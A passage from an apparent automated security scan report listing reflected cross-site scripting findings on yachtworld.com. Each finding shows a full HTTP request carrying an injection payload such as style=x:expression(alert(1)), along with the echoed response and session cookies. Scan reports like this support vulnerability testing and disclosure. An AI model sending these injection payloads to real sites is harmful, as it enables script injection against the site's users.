%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:10 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:16 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&55674"style="x:expression(alert(1))"123f0b4bcad&seo=true&N=4652&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.309. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Ohio/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Ohio/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 418e0"style%3d"x%3aexpression(alert(1))"ebd3f07f531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 418e0"style="x:expression(alert(1))"ebd3f07f531 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Ohio/1?418e0"style%3d"x%3aexpression(alert(1))"ebd3f07f531=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:12 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&seo=true&N=4664&sm=3&obp=true&418e0"style="x:expression(alert(1))"ebd3f07f531&cit=true" class="removalLink">
...[SNIP]...

3.310. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Rhode+Island/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Rhode+Island/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34cda"style%3d"x%3aexpression(alert(1))"7c56c44601e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34cda"style="x:expression(alert(1))"7c56c44601e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Rhode+Island/1?34cda"style%3d"x%3aexpression(alert(1))"7c56c44601e=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:00 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&34cda"style="x:expression(alert(1))"7c56c44601e&slim=yw&seo=true&N=4672&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.311. http://www.yachtworld.com/boats/category/type/builder/model/United+States/South+Carolina/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/South+Carolina/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 648d7"style%3d"x%3aexpression(alert(1))"f8d19d5acc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 648d7"style="x:expression(alert(1))"f8d19d5acc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/South+Carolina/1?648d7"style%3d"x%3aexpression(alert(1))"f8d19d5acc7=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:57 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:04 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&648d7"style="x:expression(alert(1))"f8d19d5acc7&slim=yw&seo=true&N=4705&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.312. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Texas/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Texas/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29956"style%3d"x%3aexpression(alert(1))"10b56f38745 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29956"style="x:expression(alert(1))"10b56f38745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Texas/1?29956"style%3d"x%3aexpression(alert(1))"10b56f38745=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:06 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&29956"style="x:expression(alert(1))"10b56f38745&seo=true&N=4709&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.313. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Virginia/1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed03b"><a>e5669ac6abc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/builder/model/United+Statesed03b"><a>e5669ac6abc/Virginia/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 